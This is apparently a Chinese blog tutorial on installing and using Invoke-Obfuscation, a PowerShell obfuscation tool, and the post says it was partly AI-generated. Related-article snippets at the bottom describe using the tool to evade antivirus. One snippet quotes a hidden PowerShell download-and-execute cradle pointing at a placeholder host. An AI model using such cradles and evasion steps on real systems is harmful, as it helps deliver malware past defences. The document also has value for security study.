Invoke-Obfuscation 安装及使用教程

最新推荐文章于 2024-08-08 08:06:58 发布
最新推荐文章于 2024-08-08 08:06:58 发布
阅读量546 收藏 11
点赞数 4
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/gitblog_00357/article/details/141011452

Invoke-Obfuscation 安装及使用教程

Invoke-ObfuscationPowerShell Obfuscator项目地址:https://gitcode.com/gh_mirrors/in/Invoke-Obfuscation

1. 项目目录结构及介绍

Invoke-Obfuscation 的源代码仓库中,主要的目录和文件包括:

  • src - 包含 Invoke-Obfuscation.ps1Invoke-Obfuscation.psm1 主要功能脚本。
  • Examples - 提供了示例脚本来展示如何使用该项目。
  • Tests - 单元测试用例,用于验证各种obfuscation技术的效果。
  • Docs - 文档相关的资料。
  • README.md - 项目概述和安装指南。

这个项目旨在提供一种PowerShell混淆工具,帮助用户探索和可视化现有的混淆技术。

2. 项目的启动文件介绍

  • Invoke-Obfuscation.ps1 - 这是项目的主入口点,包含了所有混淆函数的定义。用户可以直接导入此脚本来使用混淆功能。
  • Invoke-Obfuscation.psm1 - 这是一个模块文件,可以被Import-Module命令加载到当前的PowerShell会话中,使得所有定义在其中的函数可供调用。

执行项目通常涉及到以下步骤:

  1. 将项目克隆或下载到本地。
  2. 导入 Invoke-Obfuscation.psd1 模块,例如:Import-Module .\Invoke-Obfuscation.psd1

3. 项目的配置文件介绍

Invoke-Obfuscation 并没有特定的配置文件,它的功能通过命令行参数来控制。例如,你可以指定混淆类型、编码方式或者其他的高级选项。

在使用时,你将直接向 Invoke-Obfuscation 函数传递这些参数,而不是通过一个独立的配置文件。下面是一个简单的例子,展示了如何使用 -Technique 参数选择混淆技术:

Invoke-Obfuscation -Technique TokenManipulation -ScriptBlock {...}

在这里,-Technique 参数指定了混淆技术,而 -ScriptBlock 参数则提供了需要混淆的PowerShell脚本内容。

请注意,实际使用的参数和值取决于你的具体需求,可以在项目文档或Examples目录中的脚本中找到更多的使用示例。

Invoke-ObfuscationPowerShell Obfuscator项目地址:https://gitcode.com/gh_mirrors/in/Invoke-Obfuscation

创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考

利用Invoke-Obfuscation混淆ps文件实现上线/VT免杀率3/55
AerYinan的博客
01-12 9769
利用Invoke-Obfuscation混淆ps文件实现上线/VT免杀率3/55
【渗透测试笔记】之【免杀工具——使用Invoke-Obfuscation代码混淆免杀powershell】_yetanotherobfuscator
2401_84969340的博客
05-13 482
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
Invoke-Obfuscation-Bypass + PS2EXE 绕过主流杀软1
08-03
Invoke-Obfuscation-Bypass + PS2EXE 绕过主流杀软Invoke-Obfuscation-Bypass + PS2EXE 绕过主流
Invoke-Obfuscation
weixin_44216796的博客
01-16 2496
导入项目: Import-Module ./Invoke-Obfuscation.psd1 Invoke-Obfuscation 支持的加密功能列表 TOKEN支持分部分混淆 STRING整条命令混淆 COMPRESS将命令转为单行并压缩, ENCODING编码 LAUNCHER选择执行方式。 使用 set scriptpath C:\Users\Administrator\Desktop\payload.ps1 encoding 1 out x.ps1 powershell -windowsty
Invoke-Obfuscation笔记
mingyqf的博客
05-11 1488
坑点:window11不行,放到虚拟机win10 就行了 步骤: Import-Module ./Invoke-Obfuscation.psd1 Invoke-Obfuscation
Invoke-Obfuscation:一款功能强大的PowerShell代码混淆工具
qq_53058639的博客
07-29 327
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-fyOoLh6y-1690608873080)(data:image/gif;[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-b1JMsAWY-1690608873081)(data:image/gif;[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ALyXvPFo-1690608873083)(data:image/gif;因此,Invoke-
PowerShell木马免杀利器: Invoke-Obfuscation(过火绒)
xf555er的博客
01-07 2791
Invoke-Obfuscation工具下载地址: https://github.com/danielbohannon/Invoke-ObfuscationInvoke-Obfuscation是一款PowerShell混淆工具,可以将PowerShell脚本加密,使得它的检测和分析变得更加困难。该工具包含多种加密方法,可以单独使用也可以结合使用,以提高混淆的效果。
kali invoke-obfuscation工具使用
最新发布
06-10
以下是关于如何在 Kali Linux 环境中安装使用 Invoke-Obfuscation 的详细说明。 #### 安装 Invoke-Obfuscation 1. 首先确保 Kali Linux 系统是最新的。可以运行以下命令以更新系统: ```bash apt update && apt...
如何下载Invoke-Obfuscation
04-06
1. 打开GitHub页面:https://github.com/danielbohannon/Invoke-Obfuscation ... 3. 解压缩下载的压缩包。 4. 在解压缩后的文件夹中找到“Invoke-Obfuscation.psd1”文件...6. 下载完成,可以开始使用Invoke-Obfuscation
Invoke-Obfuscation混淆免杀过360和火绒
crowsec
06-01 2230
微信公众号:乌鸦安全 扫取二维码获取 目录 1. 模块使用 2. msfvenom下msf上线 2.1 360 2.2 Windows defender 2.3 火绒 2.4 总结 3. 混淆大法 4. 第一种混淆 1 4.1 360 4.2 windows Defender 4.3 火绒 4.4 总结 5. 第2种混淆 2 5.1 火绒 5.2 360 5.3 Windows Defender 5.4 总结 6. 第三种方法 3 6.1 360 6.2 火.
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 2701
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
利用Invoke-Obfuscation工具进行Powershell恶意脚本免杀
m0_62239233的博客
04-18 1155
记录渗透学习中的实验过程。
Invoke-Obfuscation 使用教程
gitblog_00312的博客
08-08 623
Invoke-Obfuscation 使用教程 Invoke-ObfuscationPowerShell Obfuscator项目地址:https://gitcode.com/gh_mirrors/in/Invoke-Obfuscation 项目介绍 Invoke-Obfuscation 是一个用于混淆 PowerShell 脚本的工具,旨在帮助用户理解和应用混淆技术,以绕过基于签名的检测机制。...
Invoke-Obfuscation混淆ps文件绕过Windows_Defender
weixin_30443895的博客
02-26 783
前提 powershell只能针对win7之后的系统,之前的win操作系统默认没有安装powershell。 所在目录:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 混淆 1.Cobaltstrike制作ps1后门文件 2.进入Invoke-Obfuscation Import-Module ./Invoke-Ob...
探索隐蔽的艺术:Invoke-Obfuscation 开源项目解析
gitblog_00858的博客
08-08 988
探索隐蔽的艺术:Invoke-Obfuscation 开源项目解析 Invoke-ObfuscationPowerShell Obfuscator项目地址:https://gitcode.com/gh_mirrors/in/Invoke-Obfuscation 在网络安全的世界中,攻防战永不停息。攻击者们持续进化他们的工具和技术以逃避检测,而防御者则需不断学习新的方法来应对这些威胁。Invoke...
【渗透测试笔记】之【免杀工具——使用Invoke-Obfuscation代码混淆免杀powershell】
AA8j的博客
07-06 2620
0x01 项目地址 https://github.com/danielbohannon/Invoke-Obfuscation 0x02 用法 生成powershell: powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x:55556/a'))" 下载并用powershell进入项目目录执行:Import-Module .\Invoke-Obfuscati
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

宫萍润

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值